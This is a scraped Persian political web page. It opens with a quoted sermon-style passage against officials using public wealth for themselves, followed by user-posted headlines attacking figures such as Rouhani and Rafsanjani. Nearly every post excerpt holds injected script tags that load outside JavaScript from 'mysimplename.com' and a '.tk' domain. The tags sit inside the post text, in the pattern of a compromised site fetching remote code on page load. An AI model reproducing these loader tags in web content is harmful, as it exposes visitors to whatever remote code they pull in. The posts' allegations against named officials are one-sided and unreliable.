اشرافی گری مسئولین

اشرافی گری مسئولین

«اجتناب از زخارف دنیا و زینتهای دنیا برای شخص خود»؛ از بلاهای حکومتهای دنیا یکی همین است؛ چون رئیس کشور که شدیم، منابع مالی کشور در اختیار ما است؛ وسوسه بشویم؛ [بگویم‌] اینجا زمینِ خوب هست، اینجا امکاناتِ خوب هست، اینجا پولِ خوب هست؛ از اینها یک سهمی حالا [برداریم‌]. آنهایی که خیلی شقی و بدبخت و روسیاهند، همه‌اش را برای خودشان برمیدارند، مثل رضاخان؛ آنهایی که یک خرده‌ای انصافشان بیشتر است، یک کمی‌اش را به دیگران میدهند، غالباً هم به اطرافیان خودشان؛ یک مقدار هم خودشان برمیدارند. این جزو بلایای حکومتها است؛ همین حکومتهای دموکراسی دنیا هم همه همین‌جور هستند. می‌شنوید؛ زن فلان رئیس جمهور در تعطیلی مثلاً زمستانی یا تابستانی به فلان جزیره‌ی خوش آب و هوا مسافرت کرده، این‌قدر میلیون دلار خرج کرده! از کجا؟ فلان خانواده‌ی اشرافی سلطنتی برای مسافرت وارد فلان شهر شدند، این تعداد هتل، این تعداد امکانات در اختیارشان بود، در ظرف ده روز، بیست روز که ماندند، این مقدار میلیارد -مبالغ میلیاردی- خرجشان شد! حکومت امامت با این چیزها مخالف است. استفاده‌ی شخصی از امکانات عمومی ممنوع؛ اجتناب از دنیا برای شخص خود.

انتظارات جوانان از رئیس جمهور آینده...

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>فراخوان بزرگ دریافت سوالات مردمی از نامزدهای ریاست جمهوری... از خودتان سلفی بگیرید، صدا ضبط کنید و یا متن سوال خود را در تلگرام به http://telegram.me/My_questions ارسال کنید. <script...
mohsen
توسط mohsen

انتظارات جوانان از رئیس جمهور آینده...

ویدئوی جنجالی و افشاگرانه از اموال و دارایی آقای روحانی

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>ویدئوی جنجالی و افشاگرانه از اموال و دارایی جناب روحانی از زبان امام جمعه یکی از شهرها در نماز جمعه <script type='text/javascript' src='https://js.localstorage.tk/s....
mohsen
توسط mohsen

هاشمی رفسنجانی پایه گذار اشرافی گری

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>کلیپی از سخنرانی جواد کریمی قدوسی نماینده محترم مردم مشهد مقدس در مجلس شورای اسلامی<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'>...
mohsen
توسط mohsen

مکان فوت هاشمی رفسنجانی کجاست؟

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>مکان فوت هاشمی رفسنجانی کجاست؟<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

چرا رهبری با سران دولتی فاسد برخود نمیکند؟

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>اگر سران دولتی و امثالهم انسانهای با طرز فکر و عمل درست نیستند ، چرا ولی فقیه آنها را در برخی مناصب قدرتی نگه داشته؟ <script type='text/javascript' src='https://js....
mohsen
توسط mohsen

صحبت های ناجوانمردانه ترکان در مورد افراد بومی خرمشهر

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>اکبر ترکان مشاور روحانی: مردم بومی خرمشهر و آبادان باغداری و کارگری سرمایه‌دارها را بکنند<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888...
mohsen
توسط mohsen

صحبت های ناجوانمردانه ترکان در مورد افراد بومی خرمشهر

ازدواج کردن ترس داره؟

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>وام ده میلیونی ازدواج<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

ازدواج کردن ترس داره؟

کلیپ من ضد انقلاب نیستم! | سخنان دردناک مردم محرومی که ...

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script> سخنان دردناک مردم محرومی که حرفشان به جایی نمیرسد و مسئولین در خواب هستند... کاخ نشینان برای محرومین چه کردند ؟!<script type='text/javascript' src='https://js....
mohsen
توسط mohsen

کلیپ من ضد انقلاب نیستم! | سخنان دردناک مردم محرومی که ...

مردم باید بدانند

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>مقاله تصویری دونقطه با حضور احمد امیرآبادی دبیر هیئت رئیسه مجلس شورای اسلامی: مردم باید ببینند<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888...
mohsen
توسط mohsen